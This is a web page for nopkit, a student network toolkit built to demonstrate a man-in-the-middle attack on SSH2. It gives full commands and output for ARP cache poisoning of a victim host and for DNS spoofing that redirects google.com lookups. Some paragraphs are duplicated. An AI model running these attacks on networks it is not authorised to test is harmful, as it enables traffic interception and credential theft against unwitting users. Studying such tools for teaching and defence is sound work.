[nopkit] - The Network Operator's Toolkit
Author
Jesse Pool <pool[at]eecg[dot]toronto[dot]edu>
Description
nopkit is a tool suite that can be used for monitoring
and manipulating the local network. It provides basic tools like an ARP
poisoner and a DNS spoofer to shape traffic redirection. In order to find
machines on the LAN, a tool has been included that will quickly print out
the IP and MAC addresses of all visible network nodes. New tools are currently
being written, including a browser mirror.
Most of the features you'll find here have been ported to Windows, however, much of the testing and coding was done under Linux. The libpcap and libnet libraries provide packet capture and injection portability.
Most of the features you'll find here have been ported to Windows, however, much of the testing and coding was done under Linux. The libpcap and libnet libraries provide packet capture and injection portability.
Motivation
This toolkit was part of my 4th Year Engineering Project
at Carleton University in Ottawa, Canada. Our goal was to demonstrate a
man-in-the-middle attack on an SSH2 console session. You can see more details
at the project website
or read about it in our submitted
report.
I'm now finishing up my undergrad degree and this was a fun and informative
project to take on.
Usage
Each tool has been written with the intent of being very general. My hope is that
each tool is useful on its own. The down side to this is that you kind of need
to know what you're doing to get the best use out of nopkit. Here are a few examples
with output.
Here's an example ARP poison. The intent with this command is to poison the ARP cache of 192.168.2.100. We want to receive all his traffic destined to the local gateway (192.168.2.1). The defaults take case of most of the work.
Here's an example ARP poison. The intent with this command is to poison the ARP cache of 192.168.2.100. We want to receive all his traffic destined to the local gateway (192.168.2.1). The defaults take case of most of the work.
#./xarp -a 192.168.2.1 -v -v -e -i eth2 192.168.2.100 [nopkit] - Welcome to xarp... Discovering (192.168.2.100)... Device: eth2 Addresses: Target IP = 192.168.2.100 Target MAC = 00:04:e2:94:5a:2c Source IP = 192.168.2.1 Source MAC = 00:02:3d:5b:be:f9 Config: Local MAC = 00:02:3d:5b:be:f9 Enable ICMP = No Packet Delay = 1000000 Packet Count = INFINITE Verbose = 2 Sending poison... 1. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100 2. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100 3. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100 4. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100 5. 192.168.2.1 is at 00:02:3d:5b:be:f9 -> 192.168.2.100 Received termination signal. Graceful exit... Packet Stats: ARP Packets Sent = 5 Packet Errors = 0 Bytes Written = 210The next example is a DNS spoof. We want any DNS requests made for google.com to be directed to 192.168.2.101, some web server on the LAN. The options are pretty simple, just specify the domain name and the IP address you want to put in the answer.
#./xdns -d *google.com -a 192.168.2.101 -v -v -i eth2 [nopkit] - Welcome to xdns... Device: eth2 Domain Name Service: Name = *google.com Address = 192.168.2.101 Config: Local MAC = 00:02:3d:5b:be:f9 Filter = udp and dst port 53 Time to Live = 150 seconds Verbose = 2 Listening for DNS Query... 1. Query: Source=192.168.2.100 Domain=www.yahoo.com ID=463 2. Query: Source=192.168.2.100 Domain=us.a1.yimg.com ID=464 3. Query: Source=192.168.2.100 Domain=us.i1.yimg.com ID=465 4. Query: Source=192.168.2.100 Domain=ads.osdn.com ID=466 5. Query: Source=192.168.2.100 Domain=images.slashdot.org ID=467 6. Query: Source=192.168.2.100 Domain=view.atdmt.com ID=468 7. Query: Source=192.168.2.100 Domain=images-aud.slashdot.org ID=469 8. Query: Source=192.168.2.100 Domain=spe.atdmt.com ID=470 9. Query: Source=192.168.2.100 Domain=gmail.google.com ID=471 --> Reply Sent: gmail.google.com=192.168.2.101 10. Query: Source=192.168.2.100 Domain=www.google.com ID=472 --> Reply Sent: www.google.com=192.168.2.101 11. Query: Source=192.168.2.100 Domain=microsoft.com ID=473 12. Query: Source=192.168.2.100 Domain=www.microsoft.com ID=474 13. Query: Source=192.168.2.100 Domain=rad.microsoft.com ID=475 14. Query: Source=192.168.2.100 Domain=c.microsoft.com ID=476 15. Query: Source=192.168.2.100 Domain=c1.microsoft.com ID=477 16. Query: Source=192.168.2.100 Domain=global.msads.net ID=478 Received termination signal. Graceful exit...These are just two simple examples. The other tools are similarly structured and equally general. You can find more information on using each tool in the readme. Also, use -h for a full list of options.
Download
You can download everything you need,
including compile instructions, etc. For Windows folks who don't have access
to VS 2003, you can download precompiled binaries
of each tool including a compiled Libnet.dll, but you'll still need to get
WinPcap (I've tested it out with version
3.0). See the readme for more details.
To make things a little easier for Windows developers, you can download the Libnet and WinPcap folders that I've been using. Just download these and extract them to the same directory as nopkit. Then just open the nopkit sln, and compile libnet. Once that's done the nopkit tools *should* compile. Before running, you should copy Libnet.dll to the system32 directory.
To make things a little easier for Windows developers, you can download the Libnet and WinPcap folders that I've been using. Just download these and extract them to the same directory as nopkit. Then just open the nopkit sln, and compile libnet. Once that's done the nopkit tools *should* compile. Before running, you should copy Libnet.dll to the system32 directory.
Warning
nopkit is not guaranteed in any way. Read the licence
before downloading. This software may break stuff.